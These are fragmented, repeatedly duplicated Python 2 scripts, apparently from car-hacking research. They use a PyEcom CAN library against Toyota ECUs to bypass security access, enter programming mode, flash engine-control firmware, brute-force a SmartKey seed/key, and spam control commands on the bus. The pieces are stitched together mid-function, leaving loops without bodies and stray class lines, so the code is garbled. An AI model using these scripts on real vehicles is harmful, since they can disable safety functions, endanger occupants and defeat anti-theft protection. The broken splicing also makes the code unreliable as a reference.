ECU = 0x7E0
#do security access
ret = ecom.security_access(ECU)
if ret == False:
print "[!] [0x%04X] Security Access: FAILURE" % (ECU)
sys.exit(1)
print "[*] [0x%04X] Security Access: Success" % (ECU)
#Unsure but this happens 3x in the capture before diag programming mode
#I think this may have to do w/ tellin other ECUs the one being reprogrammed
#is going offline for a while and DO NOT set DTC codes
for i in range(0, 3):
ret = ecom.send_iso_tp_data(0x720, [0xA0, 0x27])
#Grequires the to be in half-on state (power on, engine off)
#Failure to be in the required mode will result in diagnostic session failing
ret = ecom.diagnostic_session(ECU, [0x10, 0x02])
if ret == False:
print "[!] [0x%04X] Programming Mode: Failure" % (ECU)
sys.exit(1)
print "[*] [0x%04X] Programming Mode: Success" % (ECU)
## for ecu_num, ecu_name in PriusECU.iteritems():
## print "Trying security access for %s" % (ecu_name)
## #security access
## ret = ecom.security_access(ecu_num)
from PyEcom import *
from config import *
from ctypes import *
import time, struct
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1,37440)
LOOPER = 0
SETSPEED = 62
SFFLINE = "IDH: 07, IDL: C0, Len: 08, Data: 04 30 01 00 02 00 00 00"
SFFArray = SFFMessage * 1
SFFS = SFFArray()
ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0]))
#if(SETSPEED < 200):
# SETSPEED = SETSPEED * 161
#SFFS[0].data[0] = (SETSPEED >> 8) & 0xFF;
#SFFS[0].data[1] = SETSPEED & 0xFF;
#ecom.mydll.FixChecksum(pointer(SFFS[0]))
while(1):
ecom.send_iso_tp_data(0x7C0, [0x30, 0x01, 0x00, 0x08])
from PyEcom import *
from config import *
from ctypes import *
import time, struct
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1, 37440)
#ecom.open_device(1,0)
ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
time.sleep(3)
ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x02])
#read one message (should contain payload of: 0x08)
#sff = pointer(SFFMessage())
#ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff)
#ret = ecom.send_iso_tp_data(0x781, [0x3E])
#ecom.mydll.write_messages_from_file(ecom.handle, "input.dat")
#ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
#ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
#ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
#ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
#ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
from PyEcom import *
from config import *
import time, struct, sys
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(0, 1)
ECU = 0x7E0
#Is CPU?
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
#Get Calibration IDs
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
#????
ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80])
#Get VIN
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
ret = ecom.security_access(ECU)
if ret:
print "[*] [0x%04X] Security Access: Success" % (ECU)
#Unsure but this happens 3x in the capture before diag programming mode
#I think this may have to do w/ tellin other ECUs the one being reprogrammed
#is going offline for a while and DO NOT set DTC codes
for i in range(0, 3):
from PyEcom import *
from config import *
from ctypes import *
import time, struct
if __name__ == "__main__":
ecom = PyEcom("Debug\\ecomcat_api")
ecom.open_device(1, 37440)
# ecom.open_device(1,0)
ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
time.sleep(3)
ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x02])
# read one message (should contain payload of: 0x08)
# sff = pointer(SFFMessage())
# ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff)
# ret = ecom.send_iso_tp_data(0x781, [0x3E])
# ecom.mydll.write_messages_from_file(ecom.handle, "input.dat")
# ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01])
# ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
# ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
# ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C)
# ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
target_data = nbo_int_to_bytearr(0xBC1F6FEF)
if __name__ == "__main__":
#print "[*] Starting diagnostics check..."
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(0, 1)
PREAMBLE = False
#START PREAMBLE
if PREAMBLE == True:
#ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00])
#Supported PIDs (Bit Encoded)
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
#Get Calibration IDs
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
#do security access
ret = ecom.security_access(ECU)
if ret == False:
print "[!] [0x%04X] Security Access: FAILURE" % (ECU)
sys.exit(1)
print "[*] [0x%04X] Security Access: Success" % (ECU)
#Unsure but this happens 3x in the capture before diag programming mode
#I think this may have to do w/ tellin other ECUs the one being reprogrammed
#is going offline for a while and DO NOT set DTC codes
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(0,1)
#Set this to False if flashing fails and the script needs re-run
PREAMBLE = False
#flash binary
f = open("toyota_ecm.bin", "rb")
#START PREAMBLE
if PREAMBLE == True:
#ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00])
#Supported PIDs (Bit Encoded)
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
#Get Calibration IDs
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
#do security access
ret = ecom.security_access(ECU)
if ret == False:
print "[!] [0x%04X] Security Access: FAILURE" % (ECU)
sys.exit(1)
print "[*] [0x%04X] Security Access: Success" % (ECU)
#Unsure but this happens 3x in the capture before diag programming mode
#I think this may have to do w/ tellin other ECUs the one being reprogrammed
#is going offline for a while and DO NOT set DTC codes
from PyEcom import *
from config import *
from ctypes import *
import time, struct
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1, 37440)
LOOPER = 0
SETSPEED = 62
SFFLINE = "IDH: 07, IDL: C0, Len: 08, Data: 04 30 01 00 02 00 00 00"
SFFArray = SFFMessage * 1
SFFS = SFFArray()
ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0]))
#if(SETSPEED < 200):
# SETSPEED = SETSPEED * 161
#SFFS[0].data[0] = (SETSPEED >> 8) & 0xFF;
#SFFS[0].data[1] = SETSPEED & 0xFF;
#ecom.mydll.FixChecksum(pointer(SFFS[0]))
while (1):
ecom.send_iso_tp_data(0x7C0, [0x30, 0x01, 0x00, 0x08])
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(0, 1)
#Set this to False if flashing fails and the script needs re-run
PREAMBLE = False
#flash binary
f = open("toyota_ecm.bin", "rb")
#START PREAMBLE
if PREAMBLE == True:
#ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00])
#Supported PIDs (Bit Encoded)
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
#Get Calibration IDs
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
#do security access
ret = ecom.security_access(ECU)
if ret == False:
print "[!] [0x%04X] Security Access: FAILURE" % (ECU)
sys.exit(1)
print "[*] [0x%04X] Security Access: Success" % (ECU)
#Unsure but this happens 3x in the capture before diag programming mode
#I think this may have to do w/ tellin other ECUs the one being reprogrammed
#is going offline for a while and DO NOT set DTC codes
from PyEcom import *
from config import *
import time, struct, sys
if __name__ == "__main__":
ecom = PyEcom("Debug\\ecomcat_api")
ecom.open_device(0, 1)
ECU = 0x7E0
# Is CPU?
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
# Get Calibration IDs
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
# ????
ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80])
# Get VIN
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
ret = ecom.security_access(ECU)
if ret:
print "[*] [0x%04X] Security Access: Success" % (ECU)
# Unsure but this happens 3x in the capture before diag programming mode
# I think this may have to do w/ tellin other ECUs the one being reprogrammed
# is going offline for a while and DO NOT set DTC codes
for i in range(0, 3):
from PyEcom import *
from config import *
from ctypes import *
import time, struct
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1,35916)
#Engine ECU
ECU = 0x7E0
for i in range(0, 11):
print "Attempt %d" % (i)
resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None)
if not resp or len(resp) == 0:
print "No Response"
seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5]
#obviously incorrect
key = [0,0,0,0]
key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]]
key_resp = ecom.send_iso_tp_data(ECU, key_data, None)
err = ecom.get_error(key_resp)
if err != 0x00:
print "Error: %s" % (NegRespErrStr(err))
target_data = nbo_int_to_bytearr(0xBC1F6FEF)
if __name__ == "__main__":
#print "[*] Starting diagnostics check..."
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(0,1)
PREAMBLE = False
#START PREAMBLE
if PREAMBLE == True:
#ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00])
#Supported PIDs (Bit Encoded)
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
#Get Calibration IDs
ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
#do security access
ret = ecom.security_access(ECU)
if ret == False:
print "[!] [0x%04X] Security Access: FAILURE" % (ECU)
sys.exit(1)
print "[*] [0x%04X] Security Access: Success" % (ECU)
#Unsure but this happens 3x in the capture before diag programming mode
#I think this may have to do w/ tellin other ECUs the one being reprogrammed
#is going offline for a while and DO NOT set DTC codes
if __name__ == "__main__":
#print "[*] Starting diagnostics check..."
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1,35916)
ECU = 0x7E0
#do security access
ret = ecom.security_access(ECU)
if ret == False:
print "[!] [0x%04X] Security Access: FAILURE" % (ECU)
else:
print "[*] [0x%04X] Security Access: Success" % (ECU)
#Unsure but this happens 3x in the capture before diag programming mode
#I think this may have to do w/ tellin other ECUs the one being reprogrammed
#is going offline for a while and DO NOT set DTC codes
for i in range(0, 3):
ret = ecom.send_iso_tp_data(0x720, [0xA0, 0x27])
ret = ecom.diagnostic_session(ECU, [0x10, 0x02])
if ret == False:
print "[!] [0x%04X] Programming Mode: FAILURE" % (ECU)
else:
print "[*] [0x%04X] Programming Mode: Sucess" % (ECU)
for i in range(0, 10):
ecom.send_iso_tp_data(0x7E0, [0x30, 0x1C, 0x00, 0x0F, 0xA5, 0x01])
from PyEcom import *
from config import *
from ctypes import *
import time, struct
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1, 35916)
#Engine ECU
ECU = 0x7E0
for i in range(0, 11):
print "Attempt %d" % (i)
resp = ecom.send_iso_tp_data(ECU,
ecom.get_security_access_payload(ECU),
None)
if not resp or len(resp) == 0:
print "No Response"
seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5]
#obviously incorrect
key = [0, 0, 0, 0]
key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]]
key_resp = ecom.send_iso_tp_data(ECU, key_data, None)
err = ecom.get_error(key_resp)
if err != 0x00:
self.address = address
self.write_address = write_address
self.length = length
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1, 35916)
ECU = 0x750
#SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB
for i in range(0, 1000):
ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40)
#key = (ret[2] - 0xAB) & 0xFF
#key = (~ret[2] + 1) & 0xFF
key = i & 0xFF
ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40)
if ret[2] != 0x35:
print "New Error: %d %d" % (key, i)
break
ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001,
0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001,
0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001,
0x40)
def __init__(self, address, write_address, length):
self.address = address
self.write_address = write_address
self.length = length
if __name__ == "__main__":
ecom = PyEcom('Debug\\ecomcat_api')
ecom.open_device(1,35916)
ECU = 0x750
#SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB
for i in range(0, 1000):
ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40)
#key = (ret[2] - 0xAB) & 0xFF
#key = (~ret[2] + 1) & 0xFF
key = i & 0xFF
ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40)
if ret[2] != 0x35:
print "New Error: %d %d" % (key, i)
break
ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001, 0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001, 0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001, 0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x22, 0x0000F000, 0x00000001, 0x40)
ret = ecom.request_upload_14229(ECU, 0x01, 0x12, 0x0000F000, 0x00000001, 0x40)
